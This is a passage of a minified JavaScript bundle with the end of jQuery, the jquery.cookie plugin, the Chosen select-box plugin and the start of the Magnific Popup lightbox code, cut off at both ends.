r;return re.isWindow(t)?t.document.documentElement["client"+e]:9===t.nodeType?(r=t.documentElement,Math.max(t.body["scroll"+e],r["scroll"+e],t.body["offset"+e],r["offset"+e],r["client"+e])):void 0===i?re.css(t,n,s):re.style(t,n,i,s)},t,o?i:void 0,o,null)}})}),re.fn.size=function(){return this.length},re.fn.andSelf=re.fn.addBack,"function"==typeof define&&define.amd&&define("jquery",[],function(){return re});var on=e.jQuery,sn=e.$;return re.noConflict=function(t){return e.$===re&&(e.$=sn),t&&e.jQuery===re&&(e.jQuery=on),re},typeof t===xe&&(e.jQuery=e.$=re),re}),function(e){"function"==typeof define&&define.amd?define(["jquery"],e):"object"==typeof exports?module.exports=e(require("jquery")):e(jQuery)}(function(e){function t(e){return a.raw?e:encodeURIComponent(e)}function n(e){return a.raw?e:decodeURIComponent(e)}function i(e){return t(a.json?JSON.stringify(e):String(e))}function r(e){0===e.indexOf('"')&&(e=e.slice(1,-1).replace(/\\"/g,'"').replace(/\\\\/g,"\\"));try{return e=decodeURIComponent(e.replace(s," ")),a.json?JSON.parse(e):e}catch(t){}}function o(t,n){var i=a.raw?t:r(t);return e.isFunction(n)?n(i):i}var s=/\+/g,a=e.cookie=function(r,s,l){if(arguments.length>1&&!e.isFunction(s)){if(l=e.extend({},a.defaults,l),"number"==typeof l.expires){var d=l.expires,c=l.expires=new Date;c.setMilliseconds(c.getMilliseconds()+864e5*d)}return document.cookie=[t(r),"=",i(s),l.expires?"; expires="+l.expires.toUTCString():"",l.path?"; path="+l.path:"",l.domain?"; domain="+l.domain:"",l.secure?"; secure":""].join("")}for(var u=r?void 0:{},p=document.cookie?document.cookie.split("; "):[],f=0,h=p.length;h>f;f++){var m=p[f].split("="),g=n(m.shift()),A=m.join("=");if(r===g){u=o(A,s);break}r||void 0===(A=o(A))||(u[g]=A)}return u};a.defaults={},e.removeCookie=function(t,n){return e.cookie(t,"",e.extend({},n,{expires:-1})),!e.cookie(t)}}),function(){var e,t,n,i,r,o={}.hasOwnProperty,s=function(e,t){function n(){this.constructor=e}for(var i in t)o.call(t,i)&&(e[i]=t[i]);return n.prototype=t.prototype,e.prototype=new n,e.__super__=t.prototype,e};i=function(){function e(){this.options_index=0,this.parsed=[]}return e.prototype.add_node=function(e){return"OPTGROUP"===e.nodeName.toUpperCase()?this.add_group(e):this.add_option(e)},e.prototype.add_group=function(e){var t,n,i,r,o,s;for(t=this.parsed.length,this.parsed.push({array_index:t,group:!0,label:this.escapeExpression(e.label),title:e.title?e.title:void 0, children:0,disabled:e.disabled,classes:e.className}),o=e.childNodes,s=[],i=0,r=o.length;r>i;i++)n=o[i],s.push(this.add_option(n,t,e.disabled));return s},e.prototype.add_option=function(e,t,n){return"OPTION"===e.nodeName.toUpperCase()?(""!==e.text?(null!=t&&(this.parsed[t].children+=1),this.parsed.push({array_index:this.parsed.length,options_index:this.options_index,value:e.value,text:e.text,html:e.innerHTML,title:e.title?e.title:void 0,selected:e.selected,disabled:n===!0?n:e.disabled,group_array_index:t,group_label:null!=t?this.parsed[t].label:null,classes:e.className,style:e.style.cssText})):this.parsed.push({array_index:this.parsed.length,options_index:this.options_index,empty:!0}),this.options_index+=1):void 0},e.prototype.escapeExpression=function(e){var t,n;return null==e||e===!1?"":/[\&\<\>\"\'\`]/.test(e)?(t={"<":"&lt;",">":"&gt;",'"':"&quot;","'":"&#x27;","`":"&#x60;"},n=/&(?!\w+;)|[\<\>\"\'\`]/g,e.replace(n,function(e){return t[e]||"&amp;"})):e},e}(),i.select_to_array=function(e){var t,n,r,o,s;for(n=new i,s=e.childNodes,r=0,o=s.length;o>r;r++)t=s[r],n.add_node(t);return n.parsed},t=function(){function e(t,n){this.form_field=t,this.options=null!=n?n:{},e.browser_is_supported()&&(this.is_multiple=this.form_field.multiple,this.set_default_text(),this.set_default_values(),this.setup(),this.set_up_html(),this.register_observers(),this.on_ready())}return e.prototype.set_default_values=function(){var e=this;return this.click_test_action=function(t){return e.test_active_click(t)},this.activate_action=function(t){return e.activate_field(t)},this.active_field=!1,this.mouse_on_container=!1,this.results_showing=!1,this.result_highlighted=null,this.allow_single_deselect=null!=this.options.allow_single_deselect&&null!=this.form_field.options[0]&&""===this.form_field.options[0].text?this.options.allow_single_deselect:!1,this.disable_search_threshold=this.options.disable_search_threshold||0,this.disable_search=this.options.disable_search||!1,this.enable_split_word_search=null!=this.options.enable_split_word_search?this.options.enable_split_word_search:!0,this.group_search=null!=this.options.group_search?this.options.group_search:!0,this.search_contains=this.options.search_contains||!1,this.single_backstroke_delete=null!=this.options.single_backstroke_delete?this.options.single_backstroke_delete:!0,this.max_selected_options=this.options.max_selected_options||1/0,this.inherit_select_classes=this.options.inherit_select_classes||!1,this.display_selected_options=null!=this.options.display_selected_options?this.options.display_selected_options:!0,this.display_disabled_options=null!=this.options.display_disabled_options?this.options.display_disabled_options:!0,this.include_group_label_in_selected=this.options.include_group_label_in_selected||!1},e.prototype.set_default_text=function(){return this.form_field.getAttribute("data-placeholder")?this.default_text=this.form_field.getAttribute("data-placeholder"):this.is_multiple?this.default_text=this.options.placeholder_text_multiple||this.options.placeholder_text||e.default_multiple_text:this.default_text=this.options.placeholder_text_single||this.options.placeholder_text||e.default_single_text,this.results_none_found=this.form_field.getAttribute("data-no_results_text")||this.options.no_results_text||e.default_no_result_text},e.prototype.choice_label=function(e){return this.include_group_label_in_selected&&null!=e.group_label?"<b class='group-name'>"+e.group_label+"</b>"+e.html:e.html},e.prototype.mouse_enter=function(){return this.mouse_on_container=!0},e.prototype.mouse_leave=function(){return this.mouse_on_container=!1},e.prototype.input_focus=function(){var e=this;if(this.is_multiple){if(!this.active_field)return setTimeout(function(){return e.container_mousedown()},50)}else if(!this.active_field)return this.activate_field()},e.prototype.input_blur=function(){var e=this;return this.mouse_on_container?void 0:(this.active_field=!1,setTimeout(function(){return e.blur_test()},100))},e.prototype.results_option_build=function(e){var t,n,i,r,o;for(t="",o=this.results_data,i=0,r=o.length;r>i;i++)n=o[i],t+=n.group?this.result_add_group(n):this.result_add_option(n),(null!=e?e.first:void 0)&&(n.selected&&this.is_multiple?this.choice_build(n):n.selected&&!this.is_multiple&&this.single_set_selected_text(this.choice_label(n)));return t},e.prototype.result_add_option=function(e){var t,n;return e.search_match&&this.include_option_in_results(e)?(t=[],e.disabled||e.selected&&this.is_multiple||t.push("active-result"),!e.disabled||e.selected&&this.is_multiple||t.push("disabled-result"),e.selected&&t.push("result-selected"),null!=e.group_array_index&&t.push("group-option"),""!==e.classes&&t.push(e.classes),n=document.createElement("li"),n.className=t.join(" "),n.style.cssText=e.style,n.setAttribute("data-option-array-index",e.array_index),n.innerHTML=e.search_text,e.title&&(n.title=e.title),this.outerHTML(n)):""},e.prototype.result_add_group=function(e){var t,n;return(e.search_match||e.group_match)&&e.active_options>0?(t=[],t.push("group-result"),e.classes&&t.push(e.classes),n=document.createElement("li"),n.className=t.join(" "),n.innerHTML=e.search_text,e.title&&(n.title=e.title),this.outerHTML(n)):""},e.prototype.results_update_field=function(){return this.set_default_text(),this.is_multiple||this.results_reset_cleanup(),this.result_clear_highlight(),this.results_build(),this.results_showing?this.winnow_results():void 0},e.prototype.reset_single_select_options=function(){var e,t,n,i,r;for(i=this.results_data,r=[],t=0,n=i.length;n>t;t++)e=i[t],e.selected?r.push(e.selected=!1):r.push(void 0);return r},e.prototype.results_toggle=function(){return this.results_showing?this.results_hide():this.results_show()},e.prototype.results_search=function(){return this.results_showing?this.winnow_results():this.results_show()},e.prototype.winnow_results=function(){var e,t,n,i,r,o,s,a,l,d,c,u;for(this.no_results_clear(),i=0,o=this.get_search_text(),e=o.replace(/[-[\]{}()*+?.,\\^$|#\s]/g,"\\$&"),l=new RegExp(e,"i"),n=this.get_search_regex(e),u=this.results_data,d=0,c=u.length;c>d;d++)t=u[d],t.search_match=!1,r=null,this.include_option_in_results(t)&&(t.group&&(t.group_match=!1,t.active_options=0),null!=t.group_array_index&&this.results_data[t.group_array_index]&&(r=this.results_data[t.group_array_index],0===r.active_options&&r.search_match&&(i+=1),r.active_options+=1),t.search_text=t.group?t.label:t.html,t.group&&!this.group_search||(t.search_match=this.search_string_match(t.search_text,n),t.search_match&&!t.group&&(i+=1),t.search_match?(o.length&&(s=t.search_text.search(l),a=t.search_text.substr(0,s+o.length)+"</em>"+t.search_text.substr(s+o.length),t.search_text=a.substr(0,s)+"<em>"+a.substr(s)),null!=r&&(r.group_match=!0)):null!=t.group_array_index&&this.results_data[t.group_array_index].search_match&&(t.search_match=!0)));return this.result_clear_highlight(),1>i&&o.length?(this.update_results_content(""),this.no_results(o)):(this.update_results_content(this.results_option_build()),this.winnow_results_set_highlight())},e.prototype.get_search_regex=function(e){var t;return t=this.search_contains?"":"^",new RegExp(t+e,"i")},e.prototype.search_string_match=function(e,t){var n,i,r,o;if(t.test(e))return!0;if(this.enable_split_word_search&&(e.indexOf(" ")>=0||0===e.indexOf("["))&&(i=e.replace(/\[|\]/g,"").split(" "),i.length))for(r=0,o=i.length;o>r;r++)if(n=i[r],t.test(n))return!0},e.prototype.choices_count=function(){var e,t,n,i;if(null!=this.selected_option_count)return this.selected_option_count;for(this.selected_option_count=0,i=this.form_field.options,t=0,n=i.length;n>t;t++)e=i[t],e.selected&&(this.selected_option_count+=1);return this.selected_option_count},e.prototype.choices_click=function(e){return e.preventDefault(),this.results_showing||this.is_disabled?void 0:this.results_show()},e.prototype.keyup_checker=function(e){var t,n;switch(t=null!=(n=e.which)?n:e.keyCode,this.search_field_scale(),t){case 8:if(this.is_multiple&&this.backstroke_length<1&&this.choices_count()>0)return this.keydown_backstroke();if(!this.pending_backstroke)return this.result_clear_highlight(),this.results_search();break;case 13:if(e.preventDefault(),this.results_showing)return this.result_select(e);break;case 27:return this.results_showing&&this.results_hide(),!0;case 9:case 38:case 40:case 16:case 91:case 17:break;default:return this.results_search()}},e.prototype.clipboard_event_checker=function(){var e=this;return setTimeout(function(){return e.results_search()},50)},e.prototype.container_width=function(){return null!=this.options.width?this.options.width:""+this.form_field.offsetWidth+"px"},e.prototype.include_option_in_results=function(e){return this.is_multiple&&!this.display_selected_options&&e.selected?!1:!this.display_disabled_options&&e.disabled?!1:!e.empty},e.prototype.search_results_touchstart=function(e){return this.touch_started=!0,this.search_results_mouseover(e)},e.prototype.search_results_touchmove=function(e){return this.touch_started=!1,this.search_results_mouseout(e)},e.prototype.search_results_touchend=function(e){return this.touch_started?this.search_results_mouseup(e):void 0},e.prototype.outerHTML=function(e){var t;return e.outerHTML?e.outerHTML:(t=document.createElement("div"),t.appendChild(e),t.innerHTML)},e.browser_is_supported=function(){return"Microsoft Internet Explorer"===window.navigator.appName?document.documentMode>=8:/iP(od|hone)/i.test(window.navigator.userAgent)?!1:!/Android/i.test(window.navigator.userAgent)||!/Mobile/i.test(window.navigator.userAgent)},e.default_multiple_text="Select Some Options",e.default_single_text="Select an Option",e.default_no_result_text="No results match",e}(),e=jQuery,e.fn.extend({chosen:function(i){return t.browser_is_supported()?this.each(function(){var t,r;t=e(this),r=t.data("chosen"),"destroy"===i&&r instanceof n?r.destroy():r instanceof n||t.data("chosen",new n(this,i))}):this}}),n=function(t){function n(){return r=n.__super__.constructor.apply(this,arguments)}return s(n,t),n.prototype.setup=function(){return this.form_field_jq=e(this.form_field),this.current_selectedIndex=this.form_field.selectedIndex,this.is_rtl=this.form_field_jq.hasClass("chosen-rtl")},n.prototype.set_up_html=function(){var t,n;return t=["chosen-container"],t.push("chosen-container-"+(this.is_multiple?"multi":"single")),this.inherit_select_classes&&this.form_field.className&&t.push(this.form_field.className),this.is_rtl&&t.push("chosen-rtl"),n={"class":t.join(" "),style:"width: "+this.container_width()+";",title:this.form_field.title},this.form_field.id.length&&(n.id=this.form_field.id.replace(/[^\w]/g,"_")+"_chosen"),this.container=e("<div />",n),this.is_multiple?this.container.html('<ul class="chosen-choices"><li class="search-field"><input type="text" value="'+this.default_text+'" class="default" autocomplete="off" style="width:25px;" /></li></ul><div class="chosen-drop"><ul class="chosen-results"></ul></div>'):this.container.html('<a class="chosen-single chosen-default" tabindex="-1"><span>'+this.default_text+'</span><div><b></b></div></a><div class="chosen-drop"><div class="chosen-search"><input type="text" autocomplete="off" /></div><ul class="chosen-results"></ul></div>'),this.form_field_jq.hide().after(this.container),this.dropdown=this.container.find("div.chosen-drop").first(),this.search_field=this.container.find("input").first(),this.search_results=this.container.find("ul.chosen-results").first(),this.search_field_scale(),this.search_no_results=this.container.find("li.no-results").first(),this.is_multiple?(this.search_choices=this.container.find("ul.chosen-choices").first(),this.search_container=this.container.find("li.search-field").first()):(this.search_container=this.container.find("div.chosen-search").first(),this.selected_item=this.container.find(".chosen-single").first()),this.results_build(),this.set_tab_index(),this.set_label_behavior()},n.prototype.on_ready=function(){return this.form_field_jq.trigger("chosen:ready",{chosen:this})},n.prototype.register_observers=function(){var e=this;return this.container.bind("touchstart.chosen",function(t){return e.container_mousedown(t),t.preventDefault()}),this.container.bind("touchend.chosen",function(t){return e.container_mouseup(t),t.preventDefault()}),this.container.bind("mousedown.chosen",function(t){e.container_mousedown(t)}),this.container.bind("mouseup.chosen",function(t){e.container_mouseup(t)}),this.container.bind("mouseenter.chosen",function(t){e.mouse_enter(t)}),this.container.bind("mouseleave.chosen",function(t){e.mouse_leave(t)}),this.search_results.bind("mouseup.chosen",function(t){e.search_results_mouseup(t)}),this.search_results.bind("mouseover.chosen",function(t){e.search_results_mouseover(t)}),this.search_results.bind("mouseout.chosen",function(t){e.search_results_mouseout(t)}),this.search_results.bind("mousewheel.chosen DOMMouseScroll.chosen",function(t){e.search_results_mousewheel(t)}),this.search_results.bind("touchstart.chosen",function(t){e.search_results_touchstart(t)}),this.search_results.bind("touchmove.chosen",function(t){e.search_results_touchmove(t)}),this.search_results.bind("touchend.chosen",function(t){e.search_results_touchend(t)}),this.form_field_jq.bind("chosen:updated.chosen",function(t){e.results_update_field(t)}),this.form_field_jq.bind("chosen:activate.chosen",function(t){e.activate_field(t)}),this.form_field_jq.bind("chosen:open.chosen",function(t){e.container_mousedown(t)}),this.form_field_jq.bind("chosen:close.chosen",function(t){e.input_blur(t)}),this.search_field.bind("blur.chosen",function(t){e.input_blur(t)}),this.search_field.bind("keyup.chosen",function(t){e.keyup_checker(t)}),this.search_field.bind("keydown.chosen",function(t){e.keydown_checker(t)}),this.search_field.bind("focus.chosen",function(t){e.input_focus(t)}),this.search_field.bind("cut.chosen",function(t){e.clipboard_event_checker(t)}),this.search_field.bind("paste.chosen",function(t){e.clipboard_event_checker(t)}),this.is_multiple?this.search_choices.bind("click.chosen",function(t){e.choices_click(t)}):this.container.bind("click.chosen",function(e){e.preventDefault()})},n.prototype.destroy=function(){return e(this.container[0].ownerDocument).unbind("click.chosen",this.click_test_action),this.search_field[0].tabIndex&&(this.form_field_jq[0].tabIndex=this.search_field[0].tabIndex),this.container.remove(),this.form_field_jq.removeData("chosen"),this.form_field_jq.show()},n.prototype.search_field_disabled=function(){return this.is_disabled=this.form_field_jq[0].disabled,this.is_disabled?(this.container.addClass("chosen-disabled"),this.search_field[0].disabled=!0,this.is_multiple||this.selected_item.unbind("focus.chosen",this.activate_action),this.close_field()):(this.container.removeClass("chosen-disabled"),this.search_field[0].disabled=!1,this.is_multiple?void 0:this.selected_item.bind("focus.chosen",this.activate_action))},n.prototype.container_mousedown=function(t){return this.is_disabled||(t&&"mousedown"===t.type&&!this.results_showing&&t.preventDefault(),null!=t&&e(t.target).hasClass("search-choice-close"))?void 0:(this.active_field?this.is_multiple||!t||e(t.target)[0]!==this.selected_item[0]&&!e(t.target).parents("a.chosen-single").length||(t.preventDefault(),this.results_toggle()):(this.is_multiple&&this.search_field.val(""),e(this.container[0].ownerDocument).bind("click.chosen",this.click_test_action),this.results_show()),this.activate_field())},n.prototype.container_mouseup=function(e){return"ABBR"!==e.target.nodeName||this.is_disabled?void 0:this.results_reset(e)},n.prototype.search_results_mousewheel=function(e){var t;return e.originalEvent&&(t=e.originalEvent.deltaY||-e.originalEvent.wheelDelta||e.originalEvent.detail),null!=t?(e.preventDefault(),"DOMMouseScroll"===e.type&&(t=40*t),this.search_results.scrollTop(t+this.search_results.scrollTop())):void 0},n.prototype.blur_test=function(){return!this.active_field&&this.container.hasClass("chosen-container-active")?this.close_field():void 0},n.prototype.close_field=function(){return e(this.container[0].ownerDocument).unbind("click.chosen",this.click_test_action),this.active_field=!1,this.results_hide(),this.container.removeClass("chosen-container-active"),this.clear_backstroke(),this.show_search_field_default(),this.search_field_scale()},n.prototype.activate_field=function(){return this.container.addClass("chosen-container-active"),this.active_field=!0,this.search_field.val(this.search_field.val()),this.search_field.focus()},n.prototype.test_active_click=function(t){var n;return n=e(t.target).closest(".chosen-container"),n.length&&this.container[0]===n[0]?this.active_field=!0:this.close_field()},n.prototype.results_build=function(){return this.parsing=!0,this.selected_option_count=null,this.results_data=i.select_to_array(this.form_field),this.is_multiple?this.search_choices.find("li.search-choice").remove():this.is_multiple||(this.single_set_selected_text(),this.disable_search||this.form_field.options.length<=this.disable_search_threshold?(this.search_field[0].readOnly=!0,this.container.addClass("chosen-container-single-nosearch")):(this.search_field[0].readOnly=!1,this.container.removeClass("chosen-container-single-nosearch"))),this.update_results_content(this.results_option_build({first:!0})),this.search_field_disabled(),this.show_search_field_default(),this.search_field_scale(),this.parsing=!1},n.prototype.result_do_highlight=function(e){var t,n,i,r,o;if(e.length){if(this.result_clear_highlight(),this.result_highlight=e,this.result_highlight.addClass("highlighted"),i=parseInt(this.search_results.css("maxHeight"),10),o=this.search_results.scrollTop(),r=i+o,n=this.result_highlight.position().top+this.search_results.scrollTop(),t=n+this.result_highlight.outerHeight(),t>=r)return this.search_results.scrollTop(t-i>0?t-i:0);if(o>n)return this.search_results.scrollTop(n)}},n.prototype.result_clear_highlight=function(){return this.result_highlight&&this.result_highlight.removeClass("highlighted"),this.result_highlight=null},n.prototype.results_show=function(){return this.is_multiple&&this.max_selected_options<=this.choices_count()?(this.form_field_jq.trigger("chosen:maxselected",{chosen:this}),!1):(this.container.addClass("chosen-with-drop"),this.results_showing=!0,this.search_field.focus(),this.search_field.val(this.search_field.val()),this.winnow_results(),this.form_field_jq.trigger("chosen:showing_dropdown",{chosen:this}))},n.prototype.update_results_content=function(e){return this.search_results.html(e)},n.prototype.results_hide=function(){return this.results_showing&&(this.result_clear_highlight(),this.container.removeClass("chosen-with-drop"),this.form_field_jq.trigger("chosen:hiding_dropdown",{chosen:this})),this.results_showing=!1},n.prototype.set_tab_index=function(){var e;return this.form_field.tabIndex?(e=this.form_field.tabIndex,this.form_field.tabIndex=-1,this.search_field[0].tabIndex=e):void 0},n.prototype.set_label_behavior=function(){var t=this;return this.form_field_label=this.form_field_jq.parents("label"),!this.form_field_label.length&&this.form_field.id.length&&(this.form_field_label=e("label[for='"+this.form_field.id+"']")),this.form_field_label.length>0?this.form_field_label.bind("click.chosen",function(e){return t.is_multiple?t.container_mousedown(e):t.activate_field()}):void 0},n.prototype.show_search_field_default=function(){return this.is_multiple&&this.choices_count()<1&&!this.active_field?(this.search_field.val(this.default_text),this.search_field.addClass("default")):(this.search_field.val(""),this.search_field.removeClass("default"))},n.prototype.search_results_mouseup=function(t){var n;return n=e(t.target).hasClass("active-result")?e(t.target):e(t.target).parents(".active-result").first(),n.length?(this.result_highlight=n,this.result_select(t),this.search_field.focus()):void 0},n.prototype.search_results_mouseover=function(t){var n;return n=e(t.target).hasClass("active-result")?e(t.target):e(t.target).parents(".active-result").first(),n?this.result_do_highlight(n):void 0},n.prototype.search_results_mouseout=function(t){return e(t.target).hasClass("active-result")?this.result_clear_highlight():void 0},n.prototype.choice_build=function(t){var n,i,r=this;return n=e("<li />",{"class":"search-choice"}).html("<span>"+this.choice_label(t)+"</span>"),t.disabled?n.addClass("search-choice-disabled"):(i=e("<a />",{"class":"search-choice-close","data-option-array-index":t.array_index}),i.bind("click.chosen",function(e){return r.choice_destroy_link_click(e)}),n.append(i)),this.search_container.before(n)},n.prototype.choice_destroy_link_click=function(t){return t.preventDefault(),t.stopPropagation(),this.is_disabled?void 0:this.choice_destroy(e(t.target))},n.prototype.choice_destroy=function(e){return this.result_deselect(e[0].getAttribute("data-option-array-index"))?(this.show_search_field_default(),this.is_multiple&&this.choices_count()>0&&this.search_field.val().length<1&&this.results_hide(),e.parents("li").first().remove(),this.search_field_scale()):void 0},n.prototype.results_reset=function(){return this.reset_single_select_options(),this.form_field.options[0].selected=!0,this.single_set_selected_text(),this.show_search_field_default(),this.results_reset_cleanup(),this.form_field_jq.trigger("change"),this.active_field?this.results_hide():void 0},n.prototype.results_reset_cleanup=function(){return this.current_selectedIndex=this.form_field.selectedIndex,this.selected_item.find("abbr").remove()},n.prototype.result_select=function(e){var t,n;return this.result_highlight?(t=this.result_highlight,this.result_clear_highlight(),this.is_multiple&&this.max_selected_options<=this.choices_count()?(this.form_field_jq.trigger("chosen:maxselected",{chosen:this}),!1):(this.is_multiple?t.removeClass("active-result"):this.reset_single_select_options(),t.addClass("result-selected"),n=this.results_data[t[0].getAttribute("data-option-array-index")],n.selected=!0,this.form_field.options[n.options_index].selected=!0,this.selected_option_count=null,this.is_multiple?this.choice_build(n):this.single_set_selected_text(this.choice_label(n)),(e.metaKey||e.ctrlKey)&&this.is_multiple||this.results_hide(),this.search_field.val(""),(this.is_multiple||this.form_field.selectedIndex!==this.current_selectedIndex)&&this.form_field_jq.trigger("change",{selected:this.form_field.options[n.options_index].value}),this.current_selectedIndex=this.form_field.selectedIndex,e.preventDefault(),this.search_field_scale())):void 0},n.prototype.single_set_selected_text=function(e){return null==e&&(e=this.default_text),e===this.default_text?this.selected_item.addClass("chosen-default"):(this.single_deselect_control_build(),this.selected_item.removeClass("chosen-default")),this.selected_item.find("span").html(e)},n.prototype.result_deselect=function(e){var t;return t=this.results_data[e],this.form_field.options[t.options_index].disabled?!1:(t.selected=!1,this.form_field.options[t.options_index].selected=!1,this.selected_option_count=null,this.result_clear_highlight(),this.results_showing&&this.winnow_results(),this.form_field_jq.trigger("change",{deselected:this.form_field.options[t.options_index].value}),this.search_field_scale(),!0)},n.prototype.single_deselect_control_build=function(){return this.allow_single_deselect?(this.selected_item.find("abbr").length||this.selected_item.find("span").first().after('<abbr class="search-choice-close"></abbr>'),this.selected_item.addClass("chosen-single-with-deselect")):void 0},n.prototype.get_search_text=function(){return e("<div/>").text(e.trim(this.search_field.val())).html()},n.prototype.winnow_results_set_highlight=function(){var e,t;return t=this.is_multiple?[]:this.search_results.find(".result-selected.active-result"),e=t.length?t.first():this.search_results.find(".active-result").first(),null!=e?this.result_do_highlight(e):void 0},n.prototype.no_results=function(t){var n;return n=e('<li class="no-results">'+this.results_none_found+' "<span></span>"</li>'),n.find("span").first().html(t),this.search_results.append(n),this.form_field_jq.trigger("chosen:no_results",{chosen:this})},n.prototype.no_results_clear=function(){return this.search_results.find(".no-results").remove()},n.prototype.keydown_arrow=function(){var e;return this.results_showing&&this.result_highlight?(e=this.result_highlight.nextAll("li.active-result").first())?this.result_do_highlight(e):void 0:this.results_show()},n.prototype.keyup_arrow=function(){var e;return this.results_showing||this.is_multiple?this.result_highlight?(e=this.result_highlight.prevAll("li.active-result"),e.length?this.result_do_highlight(e.first()):(this.choices_count()>0&&this.results_hide(),this.result_clear_highlight())):void 0:this.results_show()},n.prototype.keydown_backstroke=function(){var e;return this.pending_backstroke?(this.choice_destroy(this.pending_backstroke.find("a").first()),this.clear_backstroke()):(e=this.search_container.siblings("li.search-choice").last(),e.length&&!e.hasClass("search-choice-disabled")?(this.pending_backstroke=e,this.single_backstroke_delete?this.keydown_backstroke():this.pending_backstroke.addClass("search-choice-focus")):void 0)},n.prototype.clear_backstroke=function(){return this.pending_backstroke&&this.pending_backstroke.removeClass("search-choice-focus"),this.pending_backstroke=null},n.prototype.keydown_checker=function(e){var t,n;switch(t=null!=(n=e.which)?n:e.keyCode,this.search_field_scale(),8!==t&&this.pending_backstroke&&this.clear_backstroke(),t){case 8:this.backstroke_length=this.search_field.val().length;break;case 9:this.results_showing&&!this.is_multiple&&this.result_select(e),this.mouse_on_container=!1;break;case 13:this.results_showing&&e.preventDefault();break;case 32:this.disable_search&&e.preventDefault();break;case 38:e.preventDefault(),this.keyup_arrow();break;case 40:e.preventDefault(),this.keydown_arrow()}},n.prototype.search_field_scale=function(){var t,n,i,r,o,s,a,l,d;if(this.is_multiple){for(i=0,a=0,o="position:absolute; left: -1000px; top: -1000px; display:none;",s=["font-size","font-style","font-weight","font-family","line-height","text-transform","letter-spacing"],l=0,d=s.length;d>l;l++)r=s[l],o+=r+":"+this.search_field.css(r)+";";return t=e("<div />",{style:o}),t.text(this.search_field.val()),e("body").append(t),a=t.width()+25,t.remove(),n=this.container.outerWidth(),a>n-10&&(a=n-10),this.search_field.css({width:a+"px"})}},n}(t)}.call(this),function(e){"function"==typeof define&&define.amd?define(["jquery"],e):e("object"==typeof exports?require("jquery"):window.jQuery||window.Zepto)}(function(e){var t,n,i,r,o,s,a="Close",l="BeforeClose",d="AfterClose",c="BeforeAppend",u="MarkupParse",p="Open",f="Change",h="mfp",m="."+h,g="mfp-ready",A="mfp-removing",v="mfp-prevent-close",y=function(){},b=!!window.jQuery,w=e(window),_=function(e,n){t.ev.on(h+e+m,n)},x=function(t,n,i,r){var o=document.createElement("div");return o.className="mfp-"+t,i&&(o.innerHTML=i),r?n&&n.appendChild(o):(o=e(o),n&&o.appendTo(n)),o},T=function(n,i){t.ev.triggerHandler(h+n,i),t.st.callbacks&&(n=n.charAt(0).toLowerCase()+n.slice(1),t.st.callbacks[n]&&t.st.callbacks[n].apply(t,e.isArray(i)?i:[i]))},E=function(n){return n===s&&t.currTemplate.closeBtn||(t.currTemplate.closeBtn=e(t.st.closeMarkup.replace("%title%",t.st.tClose)),s=n),t.currTemplate.closeBtn},C=function(){e.magnificPopup.instance||(t=new y,t.init(),e.magnificPopup.instance=t)},M=function(){var e=document.createElement("p").style,t=["ms","O","Moz","Webkit"];if(void 0!==e.transition)return!0;for(;t.length;)if(t.pop()+"Transition"in e)return!0;return!1};y.prototype={constructor:y,init:function(){var n=navigator.appVersion;t.isIE7=-1!==n.indexOf("MSIE 7."),t.isIE8=-1!==n.indexOf("MSIE 8."),t.isLowIE=t.isIE7||t.isIE8,t.isAndroid=/android/gi.test(n),t.isIOS=/iphone|ipad|ipod/gi.test(n),t.supportsTransition=M(),t.probablyMobile=t.isAndroid||t.isIOS||/(Opera Mini)|Kindle|webOS|BlackBerry|(Opera Mobi)|(Windows Phone)|IEMobile/i.test(navigator.userAgent),i=e(document),t.popupsCache={}},open:function(n){var r;if(n.isObj===!1){t.items=n.items.toArray(),t.index=0;var s,a=n.items;for(r=0;r<a.length;r++)if(s=a[r],s.parsed&&(s=s.el[0]),s===n.el[0]){t.index=r;break}}else t.items=e.isArray(n.items)?n.items:[n.items],t.index=n.index||0;if(t.isOpen)return void t.updateItemHTML();t.types=[],o="",n.mainEl&&n.mainEl.length?t.ev=n.mainEl.eq(0):t.ev=i,n.key?(t.popupsCache[n.key]||(t.popupsCache[n.key]={}),t.currTemplate=t.popupsCache[n.key]):t.currTemplate={},t.st=e.extend(!0,{},e.magnificPopup.defaults,n),t.fixedContentPos="auto"===t.st.fixedContentPos?!t.probablyMobile:t.st.fixedContentPos,t.st.modal&&(t.st.closeOnContentClick=!1,t.st.closeOnBgClick=!1,t.st.showCloseBtn=!1,t.st.enableEscapeKey=!1),t.bgOverlay||(t.bgOverlay=x("bg").on("click"+m,function(){t.close()}),t.wrap=x("wrap").attr("tabindex",-1).on("click"+m,function(e){t._checkIfClose(e.target)&&t.close()}),t.container=x("container",t.wrap)),t.contentContainer=x("content"),t.st.preloader&&(t.preloader=x("preloader",t.container,t.st.tLoading));var l=e.magnificPopup.modules;for(r=0;r<l.length;r++){var d=l[r];d=d.charAt(0).toUpperCase()+d.slice(1),t["init"+d].call(t)}T("BeforeOpen"),t.st.showCloseBtn&&(t.st.closeBtnInside?(_(u,function(e,t,n,i){n.close_replaceWith=E(i.type)}),o+=" mfp-close-btn-in"):t.wrap.append(E())),t.st.alignTop&&(o+=" mfp-align-top"),t.fixedContentPos?t.wrap.css({overflow:t.st.overflowY,overflowX:"hidden",overflowY:t.st.overflowY}):t.wrap.css({top:w.scrollTop(),position:"absolute"}),(t.st.fixedBgPos===!1||"auto"===t.st.fixedBgPos&&!t.fixedContentPos)&&t.bgOverlay.css({height:i.height(),position:"absolute"}),t.st.enableEscapeKey&&i.on("keyup"+m,function(e){27===e.keyCode&&t.close()}),w.on("resize"+m,function(){t.updateSize()}),t.st.closeOnContentClick||(o+=" mfp-auto-cursor"),o&&t.wrap.addClass(o);var c=t.wH=w.height(),f={};if(t.fixedContentPos&&t._hasScrollBar(c)){var h=t._getScrollbarSize();h&&(f.marginRight=h)}t.fixedContentPos&&(t.isIE7?e("body, html").css("overflow","hidden"):f.overflow="hidden");var A=t.st.mainClass;return t.isIE7&&(A+=" mfp-ie7"),A&&t._addClassToMFP(A),t.updateItemHTML(),T("BuildControls"),e("html").css(f),t.bgOverlay.add(t.wrap).prependTo(t.st.prependTo||e(document.body)),t._lastFocusedEl=document.activeElement,setTimeout(function(){t.content?(t._addClassToMFP(g),t._setFocus()):t.bgOverlay.addClass(g),i.on("focusin"+m,t._onFocusIn)},16),t.isOpen=!0,t.updateSize(c),T(p),n},close:function(){t.isOpen&&(T(l),t.isOpen=!1,t.st.removalDelay&&!t.isLowIE&&t.supportsTransition?(t._addClassToMFP(A),setTimeout(function(){t._close()},t.st.removalDelay)):t._close())},_close:function(){T(a);var n=A+" "+g+" ";if(t.bgOverlay.detach(),t.wrap.detach(),t.container.empty(),t.st.mainClass&&(n+=t.st.mainClass+" 